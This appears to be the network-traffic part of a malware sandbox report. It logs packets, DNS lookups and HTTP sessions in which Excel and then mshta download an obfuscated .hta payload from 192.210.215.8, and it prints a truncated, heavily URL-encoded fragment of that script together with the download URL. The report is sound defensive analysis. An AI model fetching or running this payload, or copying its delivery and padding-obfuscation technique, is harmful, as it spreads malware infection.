                                                                                              Oct 24, 2024 08:40:14.685169935 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.685206890 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.685273886 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.685273886 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.685285091 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.685343981 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.688391924 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.688426971 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.688447952 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.688463926 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.688469887 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.688529015 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.695617914 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.695652008 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.695775032 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.695791960 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.695800066 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.716314077 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.716352940 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.716572046 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.716572046 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.716587067 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.725150108 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.725240946 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.725269079 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.725286961 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.725316048 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.785832882 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.785871983 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.785988092 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.785988092 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.786003113 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.786449909 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.786479950 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.786520004 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.786520004 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.786530972 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.786541939 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.786572933 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787187099 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787220001 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787300110 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787307024 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787365913 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787786007 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787820101 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787849903 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787849903 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787859917 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787874937 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.789706945 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.794965029 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.794996977 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.795075893 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.795075893 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.795084953 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.804536104 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.804569960 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.804727077 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.804743052 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.805095911 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.807647943 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.807678938 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.807769060 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.807769060 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.807777882 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817341089 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817375898 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817436934 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.817445040 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817459106 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.836142063 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.836210012 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.836330891 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.836348057 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.836410046 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.845268965 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.845304012 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.845376015 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.845376015 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.845386028 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.845474005 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.872895002 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.872919083 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.873075008 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.873075008 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.873090029 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904768944 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904807091 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904896021 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.904906034 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904930115 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.904930115 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905225039 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905256033 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905313015 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905322075 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905349970 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905349970 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905867100 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905900002 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905950069 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905950069 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905958891 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.906037092 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.906133890 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.906450033 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:18.566858053 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.572436094 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:18.572737932 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.572737932 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.578144073 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:18.619843960 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.671087027 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:19.075103998 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:19.075213909 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.313595057 CEST4917680192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.319082975 CEST8049176192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:27.319149017 CEST4917680192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.319303989 CEST4917680192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.324610949 CEST8049176192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:27.990432978 CEST8049176192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:28.073266029 CEST4917680192.168.2.22192.210.215.8

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 24, 2024 08:39:28.023102045 CEST5456253192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 08:39:28.030781984 CEST53545628.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:31.281980038 CEST5291753192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 08:39:31.302525043 CEST53529178.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:51.759336948 CEST6275153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 08:39:51.768742085 CEST53627518.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:55.070646048 CEST5789353192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 08:39:55.086539984 CEST53578938.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:58.218770981 CEST5482153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 08:39:58.235421896 CEST53548218.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:06.265902996 CEST5471953192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 08:40:06.276474953 CEST53547198.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:08.239335060 CEST4988153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 08:40:08.255554914 CEST53498818.8.8.8192.168.2.22

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 24, 2024 08:39:28.023102045 CEST192.168.2.228.8.8.80x9c13Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:31.281980038 CEST192.168.2.228.8.8.80xd86cStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:51.759336948 CEST192.168.2.228.8.8.80x2ffaStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:55.070646048 CEST192.168.2.228.8.8.80x3c08Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:58.218770981 CEST192.168.2.228.8.8.80xce1fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:40:06.265902996 CEST192.168.2.228.8.8.80x56b1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:40:08.239335060 CEST192.168.2.228.8.8.80x6875Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 24, 2024 08:39:28.030781984 CEST8.8.8.8192.168.2.220x9c13No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:31.302525043 CEST8.8.8.8192.168.2.220xd86cNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:51.768742085 CEST8.8.8.8192.168.2.220x2ffaNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:55.086539984 CEST8.8.8.8192.168.2.220x3c08No error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:39:58.235421896 CEST8.8.8.8192.168.2.220xce1fNo error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:40:06.276474953 CEST8.8.8.8192.168.2.220x56b1No error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 08:40:08.255554914 CEST8.8.8.8192.168.2.220x6875No error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • u4u.kids
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • 192.210.215.8

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.2249162192.210.215.8803404C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 08:39:29.252609968 CEST383OUTGET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: 192.210.215.8
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 08:39:29.928579092 CEST1236INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 06:39:29 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                              Last-Modified: Wed, 23 Oct 2024 03:51:20 GMT
                                                                                              ETag: "20b6a-6251ccc7de906"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 133994
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/hta
                                                                                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 68 74 6d 6c 25 32 35 [TRUNCATED]
                                                                                              Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScRIPt%252520TYpE%25253D%252522tExT/VbsCrIPT%252522%25253E%25250AdIm%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                              Oct 24, 2024 08:39:29.928594112 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                              Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                              Oct 24, 2024 08:39:29.928605080 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                              Oct 24, 2024 08:39:29.928616047 CEST672INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                              Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                              Oct 24, 2024 08:39:29.928627968 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                              Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                              Oct 24, 2024 08:39:29.928637028 CEST212INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                              Oct 24, 2024 08:39:29.928647995 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                              Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                              Oct 24, 2024 08:39:29.928661108 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                              Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                              Oct 24, 2024 08:39:29.928670883 CEST424INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                              Oct 24, 2024 08:39:29.928683043 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                              Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                              Oct 24, 2024 08:39:29.934036016 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 33 41 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                              Data Ascii: 2520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.2249164192.210.215.8803688C:\Windows\System32\mshta.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 08:39:32.654067039 CEST460OUTGET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: fr-FR
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Range: bytes=8896-
                                                                                              Connection: Keep-Alive
                                                                                              Host: 192.210.215.8
                                                                                              If-Range: "20b6a-6251ccc7de906"
                                                                                              Oct 24, 2024 08:39:33.317365885 CEST1236INHTTP/1.1 206 Partial Content
                                                                                              Date: Thu, 24 Oct 2024 06:39:33 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                              Last-Modified: Wed, 23 Oct 2024 03:51:20 GMT
                                                                                              ETag: "20b6a-6251ccc7de906"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 125098
                                                                                              Content-Range: bytes 8896-133993/133994
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/hta
                                                                                              Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 [TRUNCATED]
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                              Oct 24, 2024 08:39:33.317383051 CEST224INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
